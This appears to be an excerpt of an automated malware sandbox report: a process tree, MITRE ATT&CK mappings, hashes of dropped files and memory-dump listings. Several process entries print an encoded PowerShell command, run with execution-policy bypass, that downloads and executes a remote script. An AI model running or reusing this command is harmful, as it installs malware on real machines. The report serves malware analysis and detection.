1⤵
PID:4672
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Modifies data under HKEY_USERS
  PID:4712

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:4752
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:4792
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    PID:4808

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Get-Content.PS1

MD5
57c548b15fb26ecf9053a5adc58db9f2

SHA1
c9f15dbef109de66634ddd66d205aa8a13d90428

SHA256
84a3d6308c04697e1b736ba62d3f9cc8b94c0183714f67cf027c6681dfad47bb

SHA512
eb99e2574128f8f6c1e6cafff310c379c8e0a8968293038bebe68ec1864b83f01bc9b72314699ea9ecf49054103ca05d6de80201519047424a1f0b865365f10a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESE8FE.tmp

MD5
2839239bbbe3f4e19aa10e6e763310ac

SHA1
cb35d84f7afbf08e1f8b94da99ecaffb4b4ff03a

SHA256
54cc9d735d9fba6b3b13ee324fc42d4e13ab34c362c5b43f1cbf447b1d99eba4

SHA512
d7277808bd05ce1e613a688a12419e6a50f044cacbe94c38e23865fad5e2b18040b9cd1538f98feca55e21e8fb7903918f6a13b27a9682778a032009ef546ae3

Download Submit
C:\Users\Admin\AppData\Local\Temp\pq0zcthn\pq0zcthn.dll

MD5
589fe94c773a37a2f539dc4eb9afbd7e

SHA1
6d84c51eb74c283b67abd725e61119923f13a1aa

SHA256
7a6eefafccb7ae6d7fe6a103ee9b607cfff2730c06b8dd641ea7f8f1802eb6f6

SHA512
df060eb9eceb1ef294ead2e70ed908fdb3b2f73c447f5f4865f492c31ead22b90f0172939ef5c9ebcfe5ae865f03b954755d09159a4ce724a0f9eb7d1019bedd

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5
37330f50cf392bca59567a22de3b836a

SHA1
f7b37328533a133567aa28f03015da69e2e36547

SHA256
a34c2923388f87e84a4f67f123626af4eff5e7d7e5abe327b6a1b1aa55a12de1

SHA512
5d1c19df182caf82388fd05e30422fa957af30a4092334a53a128e36d6c3ce2cb20aa10d96344cd8b1b145180df4d737b30bbd48a1c809ce25a82912397b19a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pq0zcthn\CSCD483745B2BE84913B93B73582E13DE16.TMP

MD5
4c2c8431a2ec0dd34cfa1b0b0ad88185

SHA1
3356bd6dd6f08dcf25cd70864f0d52e1e7dbd8b5

SHA256
50d986d121024168c8d0e020b1fa8b314197771087ad0e197f2ae4a658920c6c

SHA512
be3a925ea4a3c8757db63c0ceca27f000a98472ee7f5f5883f270f10712235b760b67a8f5801cd448e94b8650bfd5eaf87578859b465d43fb907b1c33ffdee6d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pq0zcthn\pq0zcthn.0.cs

MD5
fdff1f264c5f5570a5393659b154cb88

SHA1
de254de5e517074a9986b36fec83f921aa9aa497

SHA256
ff936e8436684fa709bed64fea9021468fd0c744a4e3412b3ef86e642d6c3769

SHA512
db434d37d6e5acb096c26abe7f07744a1a1379179f013810df3f95e41e2b7f55dfe7dc65d053a3d0c6401bc13c7dd99e940073fbe741237966620761c3b9e35a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pq0zcthn\pq0zcthn.cmdline

MD5
0c392fff70d0afbb11501e955ffc05e6

SHA1
43f4009c4ece61045ed871a76ce4acc60dca709f

SHA256
e5fcc8be208bc9a8ff4e442ed2ebfb6f79986b8db12aed731155d33b287cd64c

SHA512
a65077b76ebe1aa4b48b2e0313f2728d3f45a0825b4f01f04086a649aeb1a028746eb69759dc23cd9ad44e77ab3b6033f02d97d6b9f1c65438aa1d290a4bcba3

Download Submit
\Windows\Branding\mediasrv.png

MD5
ddc17bc082038ee52b30808daf87f090

SHA1
f862491e1195e039e05bd241856a9015846b3096

SHA256
a04583453340fa979e7efae6022c531ef06e175c388a15214bd6d32a67f1e627

SHA512
6f5edb94f56ec7e70199bfce671f20b111b102a017ba48ff7b391b09bb7485d3a7be9c2bdc2fa587b463a2874c795992db4a5dd824a4d7a4c0fdeb41ff3a9370

Download Submit
\Windows\Branding\mediasvc.png

MD5
072548125d601f1048b4cb73682cbb7b

SHA1
5d3582747ad69cff9db5aa45b20816a7c2218cf0

SHA256
e4453d95ba2fa4de68fa324a1dc8e59028969d86ea5b5a8b08a1bc33bce40582

SHA512
b54f5fcf9d153a61c82dc698d7dc7314720fda304e013ad8dc04fc277e6ff905a049f945f2adcc61df7b4853d38d92da026b7836f6aa52a331a4cba9a56184fb

Download Submit
memory/628-211-0x0000000000000000-mapping.dmp

Download
memory/636-114-0x0000026C71830000-0x0000026C71C51000-memory.dmp

Filesize
4.1MB

Download
memory/636-119-0x0000026C6F366000-0x0000026C6F367000-memory.dmp

Filesize
4KB

Download
memory/636-118-0x0000026C6F365000-0x0000026C6F366000-memory.dmp

Filesize
4KB

Download
memory/636-116-0x0000026C6F360000-0x0000026C6F362000-memory.dmp

Filesize
8KB

Download
memory/636-117-0x0000026C6F363000-0x0000026C6F365000-memory.dmp

Filesize
8KB

Download
memory/1164-142-0x0000000000000000-mapping.dmp

Download
memory/1500-138-0x0000000000000000-mapping.dmp

Download
memory/1616-209-0x0000013BD8EB8000-0x0000013BD8EB9000-memory.dmp

Filesize
4KB

Download
memory/1616-126-0x0000013BD9790000-0x0000013BD9791000-memory.dmp

Filesize
4KB

Download
memory/1616-146-0x0000013BD98E0000-0x0000013BD98E1000-memory.dmp

Filesize
4KB

Download
memory/1616-131-0x0000013BD8EB0000-0x0000013BD8EB2000-memory.dmp

Filesize
8KB

Download
memory/1616-152-0x0000013BD9EC0000-0x0000013BD9EC1000-memory.dmp

Filesize
4KB

Download
memory/1616-153-0x0000013BDA250000-0x0000013BDA251000-memory.dmp

Filesize
4KB

Download
memory/1616-129-0x0000013BD9940000-0x0000013BD9941000-memory.dmp

Filesize
4KB

Download
memory/1616-141-0x0000013BD8EB6000-0x0000013BD8EB8000-memory.dmp

Filesize
8KB

Download
memory/1616-132-0x0000013BD8EB3000-0x0000013BD8EB5000-memory.dmp

Filesize
8KB

Download
memory/1616-120-0x0000000000000000-mapping.dmp

Download
memory/1780-168-0x0000011824693000-0x0000011824695000-memory.dmp

Filesize
8KB

Download
memory/1780-219-0x0000000000000000-mapping.dmp

Download
memory/1780-160-0x0000000000000000-mapping.dmp

Download
memory/1780-167-0x0000011824690000-0x0000011824692000-memory.dmp

Filesize
8KB

Download
memory/1780-192-0x0000011824696000-0x0000011824698000-memory.dmp

Filesize
8KB

Download
memory/2088-215-0x0000000000000000-mapping.dmp

Download
memory/2156-213-0x0000000000000000-mapping.dmp

Download
memory/2172-221-0x0000000000000000-mapping.dmp

Download
memory/2216-199-0x0000000000000000-mapping.dmp

Download
memory/2216-204-0x00000221BBE08000-0x00000221BBE0A000-memory.dmp

Filesize
8KB

Download
memory/2216-200-0x00000221BBE00000-0x00000221BBE02000-memory.dmp

Filesize
8KB

Download
memory/2216-202-0x00000221BBE06000-0x00000221BBE08000-memory.dmp

Filesize
8KB

Download
memory/2216-201-0x00000221BBE03000-0x00000221BBE05000-memory.dmp

Filesize
8KB

Download
memory/2852-222-0x0000000000000000-mapping.dmp

Download
memory/2852-212-0x0000000000000000-mapping.dmp

Download
memory/2960-206-0x000001F6C6480000-0x000001F6C6482000-memory.dmp

Filesize
8KB

Download
memory/2960-214-0x0000000000000000-mapping.dmp

Download
memory/2960-208-0x000001F6C6486000-0x000001F6C6488000-memory.dmp

Filesize
8KB

Download
memory/2960-207-0x000001F6C6483000-0x000001F6C6485000-memory.dmp

Filesize
8KB

Download
memory/2960-205-0x000001F6C6488000-0x000001F6C648A000-memory.dmp

Filesize
8KB

Download
memory/2960-203-0x0000000000000000-mapping.dmp

Download
memory/3252-216-0x0000000000000000-mapping.dmp

Download
memory/3424-210-0x0000000000000000-mapping.dmp

Download
memory/3556-217-0x0000000000000000-mapping.dmp

Download
memory/3964-218-0x0000000000000000-mapping.dmp

Download
memory/4072-220-0x0000000000000000-mapping.dmp

Download
memory/4128-225-0x0000000000000000-mapping.dmp

Download
memory/4148-226-0x0000000000000000-mapping.dmp

Download
memory/4208-227-0x0000000000000000-mapping.dmp

Download
memory/4228-228-0x0000000000000000-mapping.dmp

Download
memory/4288-229-0x0000000000000000-mapping.dmp

Download
memory/4308-230-0x0000000000000000-mapping.dmp

Download
memory/4368-231-0x0000000000000000-mapping.dmp

Download
memory/4388-232-0x0000000000000000-mapping.dmp

Download
memory/4448-233-0x0000000000000000-mapping.dmp

Download
memory/4468-234-0x0000000000000000-mapping.dmp

Download
memory/4528-235-0x0000000000000000-mapping.dmp

Download
memory/4548-236-0x0000000000000000-mapping.dmp

Download
memory/4636-237-0x0000000000000000-mapping.dmp

Download
memory/4712-238-0x0000000000000000-mapping.dmp

Download
memory/4792-239-0x0000000000000000-mapping.dmp

Download
memory/4808-240-0x0000000000000000-mapping.dmp

Download
memory/4808-241-0x000001C273920000-0x000001C273922000-memory.dmp

Filesize
8KB

Download
memory/4808-242-0x000001C273923000-0x000001C273925000-memory.dmp

Filesize
8KB

Download
memory/4808-243-0x000001C273926000-0x000001C273928000-memory.dmp

Filesize
8KB

Download
memory/4964-244-0x0000000000000000-mapping.dmp

Download
memory/4980-245-0x0000000000000000-mapping.dmp

Download
memory/5004-246-0x0000000000000000-mapping.dmp

Download
memory/5056-247-0x0000000000000000-mapping.dmp

Download